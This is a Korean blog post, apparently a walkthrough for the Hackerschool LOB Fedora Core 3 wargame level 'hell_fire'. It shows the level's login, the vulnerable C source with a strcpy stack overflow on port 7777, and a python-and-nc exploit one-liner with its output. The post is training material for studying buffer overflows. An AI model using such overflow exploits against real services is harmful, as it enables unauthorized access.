해커스쿨 LOB FC3 [dark_eyes -> hell_fire] 풀이
M4ndU
해커스쿨 LOB FC3 [dark_eyes -> hell_fire] 풀이입니다.
ID | dark_eyes
PW | because of you
으로 로그인합니다.
$ ls -l
를 이용해 어떤 파일과 폴더가 있는지 확인하고,
$ cat [문제이름].c
를 이용해 소스코드를 확인합니다.
[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- hell_fire
- Remote BOF on Fedora Core 3
- hint : another fake ebp or got overwriting
- port : TCP 7777
*/
#include <stdio.h>
int main()
{
char buffer[256];
char saved_sfp[4];
char temp[1024];
printf("hell_fire : What's this smell?\n");
printf("you : ");
fflush(stdout);
// give me a food
fgets(temp, 1024, stdin);
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, temp);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
printf("%s\n", buffer);
}
(python -c 'print "A"*268+"\x84\x07\x75"';cat) | nc localhost 7777
[dark_eyes@Fedora_1stFloor ~]$ (python -c 'print "A"*268+"\x84\x07\x75\x00"';cat) | nc localhost 7777
hell_fire : What's this smell?
you :
my-pass
euid = 503
sign me up
'System Hacking > LOB FC' 카테고리의 다른 글
| 해커스쿨 LOB FC3 [evil_wizard -> dark_stone] 풀이 (0) | 2019.02.20 |
|---|---|
| 해커스쿨 LOB FC3 [hell_fire -> evil_wizard] 풀이 (0) | 2019.02.19 |
| 해커스쿨 LOB FC3 [iron_golem -> dark_eyes] 풀이 (0) | 2018.08.18 |
| 해커스쿨 LOB FC3 [gate -> iron_golem] 풀이 (0) | 2018.08.17 |
| 해커스쿨 LOB FC 페도라 코어 다운로드 (0) | 2018.08.17 |